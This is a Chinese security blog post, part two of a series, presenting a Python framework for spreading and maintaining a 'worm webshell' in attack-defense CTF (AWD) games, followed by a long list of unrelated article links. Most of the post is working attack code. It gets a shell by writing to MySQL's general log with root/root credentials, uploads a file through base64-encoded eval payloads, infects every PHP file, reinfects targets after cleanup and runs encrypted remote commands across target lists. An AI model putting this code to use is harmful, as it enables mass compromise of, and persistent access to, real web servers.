基於AWD比賽的蠕蟲webshell(二)

2019-10-21 15:46:05 合天網安實驗室

http://link.zhihu.com/?target=https%3A//mp.weixin.qq.com/s/Nw2VDyvCpPt_GG5YKTQuUQ

0x00 python維持復活框架

一個蠕蟲webshell只是相當於一枚好的子彈，我們還需要配置一把槍來搭配使用，那麼如何做到我們落地98k，別人落地還要慢慢撿槍才能吃雞呢。上篇只是的簡單執行命令的客戶端，但下面這個是基於這個蠕蟲webshell的python維持復活框架，大致思路是這樣的。

0x01 webshell特性

首先回顧一下最終版蠕蟲webshell的特性如下：

遞歸掃描所有web目錄及文件，全部掃到的php寫入webshell
網站全部php可作為webshell連接執行命令
不帶參數請求又可以正常訪問原頁面，不影響訪問
所有web路徑目錄寫入單獨一個特定webshell
判斷是否寫過不再重複寫入
所有php頁面都可以互相復活蠕蟲webshell
蠕蟲webshell返回所有php文件url地址
蠕蟲webshell發送返回數據傳輸加密
數字簽名校驗執行、5秒後不可重放
頁面功能性可控（可以使全部php原有功能失效，只剩下webshell功能）
前端互相復活以及反滲透
適配meterpreter連接
加密混淆

具體的蠕蟲webshell代碼詳情可以參考上一篇文章：基於AWD比賽的蠕蟲webshell(一)

0x02 流程

根據以上蠕蟲webshell特性我們可以設計一個框架出來使蠕蟲從生成到維持最後互相復活，如果都被刪了或者對手重置環境，就自動快速重新getshell再次復活。

簡單來說就是，python有技巧地批量請求所有靶機ip。只需編寫getshell的模塊，模塊返回一個蠕蟲webshell的url，就會自動本地傳播感染所有php文件，即使比賽對手重置環境會重新getshell再次感染，刪掉其中一個馬會使用其他被感染的馬復活。如果在代碼最後面加個exit();全部php頁面將會失效只剩下webshell功能。（適用於登山奪旗模式比賽）因為比賽環境實在太多突發狀況，我認為已經考慮到比較多出現的情況就是超時，webshell失效，漏洞修補完成，上馬後別人刪所有文件等等，但不排除還會有其他錯誤使這個py跑崩的情況，目前沒發現。

0x03 代碼解析

框架中假設這個情況是數據庫的root/root密碼getshell。並且在自己awd服務器查到web絕對路徑是/var/www/html(比賽時靶機大家都一樣，可以查看自己的絕對路徑)，我們的getshell方式是數據庫日誌寫shell，然後通過shell上傳蠕蟲webshell，再維持權限和復活。

於是有了以下的代碼，要結合上面的思路圖來看。

#!/usr/bin/python # -*- coding: UTF-8 -*- # made by 3s_NwGeek import requests,random,MySQLdb,re,base64 import time from gevent import monkey from gevent.pool import Pool from bs4 import BeautifulSoup from urllib import unquote monkey.patch_all() passwd = 'admin'#這是蠕蟲webshell的密碼 username="root"#數據庫名一定要root權限才可以有效寫文件 login_psw="root" webshell_path= 'http://TARGET_IP/service.php'#要跟查詢路徑的文件名相同！！！！！！！！！ webshell_psw='a111' localfile = 'C:\\Users\\\\3s_NwGeek\\Desktop\\\\light.php' # 本地待上傳的馬文件名 #Secure_file_priv <5.5.53可以直接loadfile讀flag，然後命令行curl提交 # #路徑要改,log_file = 'C:/phpstudy/WWW/test1.php'一定要跟上面webshell_path保持統一文件名 webroot='D:/installed_software/phpstudy/WWW' cmd='del %s/service.php'%webroot #數據庫要執行的命令 sqlquerys=('''select @@version; set global general_log = off; set global general_log = on; set global general_log_file = '%s/service.php'; select " 
"; set global general_log = off; '''%webroot).splitlines() #TARGET_IP不用改，會在函數中替換，填多幾個php作為備用訪問 bakup_webshell_url='''http://TARGET_IP/index.php http://TARGET_IP/light.php'''.splitlines() #批量目標主機，格式127.0.0.1:80 targets=open("C:\\Users\\\\3s_NwGeek\\Desktop\\\\target.txt").read().splitlines()#批量目標 ##只需填上面的部分即可 localfile_content = open(localfile, 'rb').read() def main(target): while True: usual_get(target) webshell_url=upupup(target) #讀取url php -loadip 、reupload、get ?_、norespond、random get # print webshell_url,'testing!!!!' if not webshell_url: print 'if not webshell_url and continute' continue elif 'http' not in webshell_url: time.sleep(3) # print "主循環一次" print 'elif http not in webshell_url:' continue tar,res=maintain_webshell(webshell_url,target) if len(res)>0: random_get(target,res) else: # print len(res),res pass time.sleep(5) # print "主循環一次" #getshell函數，框架要求return蠕蟲webshell的url即可 def upupup(target): try: conn = MySQLdb.connect(host=target, user=username, passwd=login_psw,port=3306,connect_timeout=1) print target,':login scceuss' time.sleep(0.5) cursor = conn.cursor() # 使用execute方法執行SQL語句 # cursor.execute('set password for root@localhost = password("%s"); '%change_pwd) for sql_q in sqlquerys: cursor.execute(sql_q) time.sleep(0.5) data = cursor.fetchone() if data: print "%s return : %s " % (target, data) # 使用 fetchone() 方法獲取一條數據 # 關閉數據庫連接 conn.close() reg = ".*/([^/]*\\.php?)" w_path = webshell_path.replace('TARGET_IP', target) print w_path match_shell_name = re.search(reg, w_path) if match_shell_name: shell_name = match_shell_name.group(1) # 1.php shell_path = "" try: data = {} data[webshell_psw] = '@eval(base64_decode($_POST[z0]));' data['z0'] = 'ZWNobyAnIS1fLSEtXy0hJy4kX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddLichLV8tIS1fLSEnOw==' shell_path = re.findall(re.compile(r'\\!-_-\\!-_-\\!.+\\!-_-\\!-_-\\!'), requests.post(w_path, data).text.strip())[0].replace('!-_-!-_-!', '')#獲取絕對路徑 # print shell_path target_path = shell_path.split(shell_name)[0].replace('TARGET_IP', target) + '/.Conf_check.php' # 獲取上傳絕對路徑文件地址 # print 'target_path:',target_path target_path_base64 = base64.b64encode(target_path) # print w_path,w_path.split(shell_name) target_file_url = w_path.split(shell_name)[0].replace('TARGET_IP', target) + '/.Conf_check.php' # 上傳url地址 # print 'target_file_url:',target_file_url data = {} data[webshell_psw] = '@eval(base64_decode($_POST[z0]));' data[ 'z0'] = 'QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzsKJGY9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoxIl0pOwokYz1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejIiXSk7CiRidWY9IiI7CmZvcigkaT0wOyRpPHN0cmxlbigkYyk7JGkrPTEpCiAgICAkYnVmLj1zdWJzdHIoJGMsJGksMSk7CmVjaG8oQGZ3cml0ZShmb3BlbigkZiwidyIpLCRidWYpKTsKZWNobygifDwtIik7CmRpZSgpOw==' data['z1'] = target_path_base64 data['z2'] = base64.b64encode(localfile_content) # print 'webshell_path:',w_path,data requests.post(w_path , data).text.strip() if 'check_url' in requests.get(target_file_url + "?_").content: print target,':getshell success!!!!!!!!!!!!!!',excmd(target_file_url, passwd, cmd, encoding='utf-8') return target_file_url.replace('TARGET_IP', target) except Exception as e: if 'list out of range' in str(e): print target,'日誌獲取根路徑錯誤：target_path' print e pass except Exception as e: print target+' is no vul:','有可能輸入格式錯誤',e def maintain_webshell(webshell_url, target, Timeout=5):#檢測函數，返回檢測目標，檢測結果 # print "進入maintain_webshell()" head = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 'Connection': 'close', 'Upgrade-Insecure-Requests': '1', 'Cache-Control': 'max-age=0'} try: r=requests.get(webshell_url + '?_', headers=head,timeout=5,proxies={'http': 'http://127.0.0.1:8080'}) # print r.content # html=BeautifulSoup(r.content.decode('gb2312','ignore'),'lxml')#注意根據實際情況編碼 html = BeautifulSoup(r.content, 'lxml', from_encoding="utf8") # 注意根據實際情況編碼 checks_arr = html.find_all(attrs={'id': 'check_url'})#獲取url if len(checks_arr)<2:#爬取失敗重傳馬 print target,"%s 獲取phpurl：%d 狀態碼 %d webshell失效，正在嘗試重傳webshell\\n" % (webshell_url,len(checks_arr),r.status_code) time.sleep(0.5) webshell_url, check_res=maintain_webshell(upupup(target), target)# # usual_get(target) else: check_res = [] for check_str in checks_arr: check_res.append(check_str.string) print "權限維持成功:",target,len(check_res),webshell_url # print "跳出maintain_webshell():find_allphp" return webshell_url, check_res except Exception as e: if 'timeout' in str(e): RCE_res=excmd(webshell_url, passwd, 'echo testRCE') if RCE_res: print target,'：執行命令成功，但感染超時，請使用輕便版--------->',RCE_res return webshell_url,bakup_webshell_url else: print target+'：執行命令失敗，可能權限不足感染失敗，或者php遍歷函數被禁，or 主機連接失敗' print target,'err from maintain_webshell',e # print "跳出maintain_webshell():err" return webshell_url,[] def random_get(target,res): try: # print "進入random_get" buff=res while len(res)>1: ran_url=random.sample(buff,1)[0] ran_url, res = maintain_webshell(ran_url, target) if len(res)<2:#失效情況下 random.shuffle(buff) for url in buff: url, res = maintain_webshell(url, target) if len(res)>2: buff=res break print target,'該webshell失效，正在嘗試緩存buff' elif len(res)>=2:#成功情況下 buff=list(set(buff+res)) # print buff print len(buff) time.sleep(3) else: print "random_get——res：",res,"buff:",buff usual_get(target) # print "跳出random_get()"# print '權限維持成功：', len(res),r, res except Exception as e: print '%s "err from random_get"：上傳webshell_url錯誤！:%s'%(target,e) pass def usual_get(target): try: # print "進入usual_get()" base_url='http://'+target+'/.Conf_check.php' w_url,res=maintain_webshell(base_url,target) if len(res)>1: # print res random_get(target,res) # print "跳出usual_get()" except: pass ################以下為命令執行函數 def getSerTime(url): ser_time_format = '%a, %d %b %Y %H:%M:%S GMT' head = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 'Connection': 'close', 'Upgrade-Insecure-Requests': '1', 'Cache-Control': 'max-age=0'} r = requests.get(url, allow_redirects=False,headers=head,proxies={'http': 'http://127.0.0.1:8080'}) if r.headers['Date']: stimestrp = time.strptime(r.headers['Date'], ser_time_format) stime = time.mktime(stimestrp) + 60 * 60 * 8 # GMT + 8 時區 timeskew = int(time.time()) - int(stime) return timeskew else: return None # 加密 def encrypt(string, salt, encoding='utf-8'): estring = '' b64string = base64.b64encode(string.encode(encoding)).decode('utf-8') for n, char in enumerate(b64string): estring += chr(ord(char) ^ n % salt) return estring # 解密 def decrypt(estring, salt, encoding='utf-8'): data=estring[::-1].replace('cAFAcABAAswTA2GE2c','i').replace(':kcehc_revres','=').encode('unicode_escape').decode("string_escape") string=unquote(base64.urlsafe_b64decode(data)) # string=unicode(string, "gb2312").encode("utf8")#有中文亂碼去掉這個註釋 return string # 命令執行 def excmd(url, passwd, cmd, encoding='utf-8'): try: timeskew = getSerTime('/'.join(url.split('/')[:-1])) # 校對服務器時間，防止時間差造成API校驗失敗 nowtime = int(time.time()) if timeskew == None: print('檢查服務器時間出錯，請手動確認服務器時間！') # 手動獲取服務器時間戳，並保存到servtime變量中，int類型 servtime = time.time() nowtime = servtime else: nowtime -= timeskew # 開始發起請求 passwd = md5(passwd.encode('utf-8')).hexdigest() salt = int(random.random() * 100) ecmd = encrypt(cmd, salt) sign_tmp = ecmd + passwd + str(nowtime) + str(salt) sign = md5(sign_tmp.encode('utf-8')).hexdigest() parameters = { 'time': nowtime, 'check': ecmd, 'salt': salt, 'sign': sign } head = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 'Connection': 'close', 'Upgrade-Insecure-Requests': '1', 'Cache-Control': 'max-age=0'} r = requests.get(url, params=parameters, headers=head,proxies={'http': 'http://127.0.0.1:8080'},timeout=3) # r = requests.post(url, data=parameters, headers=head, proxies={'http': 'http://127.0.0.1:8080'}), if '0:' in r.text:print '執行成功：', res = decrypt(r.content.decode('utf-8').replace('0:',''), salt, encoding) return res except Exception as e: pass print(url,'參數配置錯誤，連接異常err:%s'%str(e)) # traceback.print_exc() if __name__ == '__main__': # main(target) pool = Pool(len(targets))#批量 pool.map(main, targets)#一個線程一個target

效果如下gif：

0x04 框架通用getshell函數編寫

有了這個框架，除了數據庫寫shell當然有很多getshell的方法，於是有了對應的腳本，通通寫好。可以把你getshell的方法寫到upupup函數就ok了，最終return一個蠕蟲webshell url運行即可。

Getshell模塊可以改為任意方式getshell填充到upupup函數里
會感染所有php
路徑文件出現中文可能報錯提示，但不影響維持運行
刪除每個目錄下的單獨馬會復活
直到所有被感染過的所有php都無法訪問會重新getshell

配合批量命令執行如以下gif：

0x05 缺點與不足

很多時候都是權限造成的寫入失敗，有命令執行的時候建議chmod 777 -R *，再curl -o 落地會增加成功幾率。

0x06 蠕蟲webshell最終版

蠕蟲webshell代碼詳情可以參考上一篇文章《基於AWD比賽的蠕蟲webshell(一)》，但實際我最終在awd比賽中用的是混淆版本，對方很難短時間內解密，已上傳至github:https://github.com/3sNwgeek/awd_worm_phpwebshell_framework/,最後祝大家年末比賽順利。

聲明：筆者初衷用於分享與普及網絡知識，若讀者因此作出任何危害網絡安全行為後果自負，與合天智匯及原作者無關！

分享到:

閱讀更多 合天網安實驗室 的文章

關鍵字: Python 設計 PHP

高級威脅防護：全新NGFW助您打好新安全形勢下的保衛戰

惡意軟件分類中的計算機視覺技術分析

PLC也會中病毒？你不能不知的真相！

[分佈式] 分佈式安全

python爬取付費小說，在我們程序員這裡收費是不存在的

Update！SMBv3遠程代碼執行漏洞CVE-2020-0796安全通告

微軟發佈“蠕蟲級別”漏洞補丁相關修復方法及問題解答在這裡

SMBv3協議曝出蠕蟲漏洞，微軟已經緊急修復

成為一個黑客最起碼要懂的16個問題，你知道嗎？

基於AWD比賽的蠕蟲webshell(四)

11.14 關於計算機病毒，你知道多少……

目前蠕蟲是破壞系統正常運行的主要手段之一

06.07 工資被黑客偷偷轉賬？可能受到了CSRF！手把手入門白帽子（四）

python網絡爬蟲簡明手冊1

06.06 python網絡爬蟲簡明手冊1

教程｜如何使用純NumPy代碼從頭實現簡單的卷積神經網絡

第二章 IoC容器和Bean配置

bean是一個對象，它是由Spring

運算裡不得不說的python模塊—math

Help

Devops度量--DevOps 現狀快速檢查表

今天主要分享一個DevOps

SOP是什麼（解讀）

SOP不是單個的，是一個體系，雖然我們可以單獨地定義每一個SOP，但真正從企業管理來看，SOP不可能只是單個的，必然是一個整體和體系，也是企業不可或缺的。

還不知道交換機上如何配置DHCP，趕緊過來圍觀吧，一分鐘包你學會

隨著終端設備的越來越多，人工干預配置IP地址，不僅工作效率低，而且，還很容易導致IP衝突，影響正常的網絡訪問。到此已經完成了，DHCP服務的配置了，我們可以在終端驗證。

還在手動配置IP地址嗎？太Low了，一分鐘教會您如何配置DHCP

Python爬蟲自學筆記：分析頭條文章網頁源文件

這兩天分析了一下頭條文章網頁的源文件，現在將分析的結果分享給大家。首先以一篇文章為例，其網址如下：https://www.toutiao.com/i6822245428176617998/如上圖網頁所示，文章中包含文字和圖片。

DNS偵查工具

我們只需要打開瀏覽器輸入例如:www.baidu.com就可以解析到該網站.為了便於記住不需要輸入長長的IP地址去訪問這就是DNS域名解析.關於域名域名的層次劃分用點來分割這時DNS把相對應的域名解析成IP地址高的在右邊.例如:www. NS簡介訪問某網站的時候最低在左邊

國人開源的異步 Python ORM：GINO

程序測評：Create React App 3.3中有哪些酷炫新功能？

Create

“明學”的魅力？我只要我覺得：駕馭終端，提高生產力

最後一個要介紹的命令是

（必收藏系列）Linux面試題——命令集

關注，後臺私信【Linux】分享Linux入門到進階電子書、Linux入門到精通視頻教程（免費）。文件管理命令cat

五分鐘學會如何在 IPFS 上部署網站

原文標題:五分鐘學會如何在

「正點原子NANO STM32F103開發板資料連載」第29章內存管理實驗

1）實驗平臺：【正點原子】

小白怎麼學Web前端開發如何成為技術達人

Web前端開發工程師已經成為了很多年輕人心中的理想工作，不僅入行門檻低、而且薪資待遇和發展前景都不錯，自然吸引了大批人加入行業。

如何開發一個web靜態服務器

我們都知道如今的web服務器有很多，比如著名的有apache，有nginx，有tomcat，有resin服務器，有sphere，有iis服務器等等，這些服務器都能提供web服務，並且幾乎都能和多種語言進行搭配使用，那麼一個web服務器都需要那些功能，開發一個web服務器都需要那些

學Java編程還有前景嗎如何才能拿到高薪

需求大、薪資高似乎是Java開發人員的標籤，不過學Java編程還有前景嗎？它架構在操作系統之上，屏蔽了底層的差異，真正實現了“Writeonce run

Python網絡爬蟲之配置篇（一）

pip

SpringBoot 整合SpringSecurity示例實現前後分離權限註解+JWT登錄認證

serverTimezone=UTC&useUnicode=true&characterEncoding=utf-8&zeroDateTimeBehavior=convertTo&useSSL=falseusername:rootpassword:

Python的運行效率太低？幾行代碼快速提升！

return的就是是你所需要的結果2.3、運行這一步就是最後一步了，只要像下面一樣輸入上述函數名，賦予參數值，點擊運行Run，就能得到你想要的結果arg1=5

python的優點是什麼？最新Python400集視頻（附教程）

2020，最新Python零基礎到精通資料教材，乾貨分享，新基礎Python教材，穩穩找到過萬工作，看這裡，這裡有你想要的所有資源哦，最強筆記，教你怎麼入門提升！獲取方式：私信小編“

MySQL中OOM故障應如何下手-愛可生

作者：孫祚龍愛可生南區分公司交付服務部成員，實習工程師。負責公司產品問題排查及日常運維工作。本文來源：原創投稿*愛可生開源社區出品，原創內容未經授權不得隨意使用，轉載請聯繫小編並註明來源。

像專家一樣使用 panic

|go

30種不同的編程語言怎麼寫“Hello, World”

printfn

percona QAN 介紹

一、背景QAN慢查詢日誌分析工具是PMM

面試官：你可以用純CSS判斷鼠標進入的方向嗎？

雖然沒什麼軟用，但是對付面試官應該是夠用了。感謝面試官提出的問題，讓我實現了這個功能，對CSS

網絡工程師職業生涯中，哪兩點是最重要的？

網絡工程師最重要的技能是紮實的基礎和非常開放的思維，微觀知識紮實、宏觀能力突出。項目經驗也會讓網絡工程師基礎更牢靠，網絡工程師是要實戰的，要避免紙上談兵，我認為對基礎理論的理解，比你清楚配置更重要。

交換機中相關術語代表什麼意思，有必要弄清楚

由淺入深瞭解以太坊 2.0：最常見問題和最全學習清單

有關以太坊2.0

【Linux簡單實用小命令001】CentOS 7、8的防火牆端口開放

yuminstall

吃透這些IPFS硬核知識點，日後搶頭礦隨時“彎道超車”

今天的你捉住IPFS機遇了嗎？我們都知道在Filecoin網絡中作為一名存儲礦工，信譽對於我們是非常重要的——信譽越高，爆塊幾率越大。那麼信譽系統現在怎麼樣了呢？

Hive分桶表

fieldsterminated

Spring中資源的加載原來是這麼一回事啊！

自己動手搭建郵件系統：怎樣讓Exchange Server 發出第一封郵件？

編輯Exchange

$【MySQL】RDS物理備份文件(.idb\.frm)恢復到MySQL自建數據庫$

【MySQL】RDS物理備份文件(.idb\.frm)恢復到MySQL自建數據庫

在阿里雲控制檯，我們能下載的文件是一個壓縮包，解壓之後，是.idb和.frm文件，你可能要問了，我可以直接把解壓好的問題件覆蓋到MySQL的data目錄下嗎？

NLP算法入門系列：隱含馬爾可夫鏈(HMM)模型的簡單介紹

即，最大化

第一章 Spring Framework概述

您可以在任何web

opencv人工智能深度學習這樣實現人臉的年齡檢測

前期的文章我們分享了人臉的識別以及如何進行人臉數據的訓練，本期文章我們結合人臉識別的模型進行人臉年齡的檢測人臉年齡的檢測步驟1、首先需要進行人臉的檢測2、把檢測到的人臉數據給年齡檢測模型去檢測3、把檢測結果呈現到圖片上人臉年齡檢測import

嵌入式linux網絡編程之——5年程序員給你深度講解socket套接字

圖8-1

深入瞭解ProcessFunction的狀態操作(Flink-1.10)

先反思為何會有上述疑惑上述疑惑產生的原因，應該是受到平時使用HashMap的影響，HashMap獲取值就是在調用get方法時指定key，設置值也是在put時指定key，所以看到state.value，看懂了這些，其實也是在瞭解DataStream/DataSetAPI的設計思路：

Redis內存分析工具--rdr安裝與使用

分析Redis

資深架構師教你源碼講解zookeeper實現分佈式鎖以及集群搭建步驟

//getData發現前一個子節點被刪除，拋出異常

一行代碼提升遷移性能

論文原址：https://arxiv.org/pdf/2003.12237.pdf開源地址：https://github.com/cuishuhao/BNM在發表在CVPR2020

利用相似幾何信息，做可泛化3D形狀分割模型

更具體的有以下三種典型的分割方案：FullyConvolutional-Like

這麼好用的開源計算器SpeedCrunch，沒有不嘗試一下的道理

介紹SpeedCrunch是一款高精度科學計算器，具有快速，鍵盤驅動的用戶界面。獲取方式在GitHub上搜索SpeedCrunch，就可以去到

分佈式緩存，真香

他是前易寶支付架構師、阿里雲MVP、騰訊雲

特徵工程的力量

在本文中，我希望教給您一些有關特徵工程的知識，以及如何使用它來對非線性決策邊界進行建模。為了說明這一點，假設恢復時間與身高和體重具有以下關係：Y=β₀+β₁+β2+β₃+noise從第三項來看，我們可以看到Y與身高和體重沒有線性關係。

java架構：天天寫面向接口編程，你考慮過性能嗎？大神都是這麼寫

public

SpringBoot如何優雅的使用RocketMQ

源碼編譯需要Maven3.2x，JDK8在根目錄進行打包:Copymvn-Prelease-all

css代碼規範工具stylelint

"mixin"